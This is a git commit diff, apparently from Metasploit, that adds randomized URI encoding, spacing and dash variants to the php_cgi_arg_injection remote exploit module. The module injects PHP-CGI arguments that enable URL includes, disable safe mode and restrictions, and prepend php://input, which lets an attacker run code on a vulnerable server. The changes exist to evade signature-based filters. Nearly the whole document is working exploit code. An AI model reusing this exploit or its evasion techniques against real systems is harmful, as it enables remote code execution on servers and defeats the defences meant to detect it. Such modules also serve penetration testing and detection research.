Lots of encoding randomizations for php_cgi_arg_injection
Jeff Jarmoc
parent
4909d8073a
commit
e1156834b9
|
|
@ -53,6 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_options([
|
||||
OptString.new('TARGETURI', [false, "The URI to request (must be a CGI-handled PHP script)"]),
|
||||
OptInt.new('URIENCODING', [true, "Level of URI URIENCODING and padding (0 for minimum)",5]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
|
@ -85,17 +86,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
begin
|
||||
args = [
|
||||
rand_spaces(rand(50)),
|
||||
create_arg("d","allow_url_include%3d#{rand_php_ini_true}"),
|
||||
create_arg("d","safe_mode%3d#{rand_php_ini_false}"),
|
||||
create_arg("d","suhosin.simulation%3d#{rand_php_ini_true}"),
|
||||
create_arg("d","disable_functions%3d%22%22"),
|
||||
create_arg("d","open_basedir%3dnone"),
|
||||
create_arg("d","auto_prepend_file%3dphp://input"),
|
||||
rand_spaces(datastore["URIENCODING"]),
|
||||
create_arg("d","allow_url_include=#{rand_php_ini_true}"),
|
||||
create_arg("d","safe_mode=#{rand_php_ini_false}"),
|
||||
create_arg("d","suhosin.simulation=#{rand_php_ini_true}"),
|
||||
create_arg("d",'disable_functions=""'),
|
||||
create_arg("d","open_basedir=none"),
|
||||
create_arg("d","auto_prepend_file=php://input"),
|
||||
create_arg("n")
|
||||
]
|
||||
|
||||
qs = args.join("+")
|
||||
qs = args.join()
|
||||
uri = "#{target_uri}?#{qs}"
|
||||
|
||||
# Has to be all on one line, so gsub out the comments and the newlines
|
||||
|
|
@ -119,13 +120,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def create_arg(arg, val = nil)
|
||||
# TODO: Randomly URI encode val - bear in mind = must always be encoded.
|
||||
if val
|
||||
val = rand_encode(val, datastore["URIENCODING"]) #randomly URI encode characters in val
|
||||
val.gsub!('=','%3d') # = must always be encoded
|
||||
val.gsub!('"','%2f') # " too
|
||||
end
|
||||
|
||||
ret = ''
|
||||
ret << "#{rand_spaces(rand(10))}"
|
||||
ret << "#{rand_spaces(datastore["URIENCODING"])}"
|
||||
ret << "#{rand_dash}"
|
||||
ret << "#{arg}"
|
||||
ret << "#{rand_spaces(rand(10))}"
|
||||
ret << "#{rand_space}"
|
||||
ret << "#{rand_spaces(datastore["URIENCODING"]-1)}"
|
||||
ret << "#{val}"
|
||||
ret << "#{rand_space}"
|
||||
end
|
||||
|
||||
def rand_encode(string, max = string.length)
|
||||
chars = [];
|
||||
if string.length == 1
|
||||
if rand(2) > 0
|
||||
chars << 0
|
||||
end
|
||||
else
|
||||
if max > 0
|
||||
max.times { chars << rand(string.length)}
|
||||
end
|
||||
end
|
||||
chars.uniq.sort.reverse.each{|index| string[index] = "%"+"%02x" % string[index]}
|
||||
string
|
||||
end
|
||||
|
||||
def rand_spaces(x)
|
||||
|
|
@ -141,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def rand_dash
|
||||
["-","%2d"][rand(2)]
|
||||
["-","%2d","%2D"][rand(3)]
|
||||
end
|
||||
|
||||
def rand_php_ini_false
|
||||
|
|
|
|||
Loading…
Reference in New Issue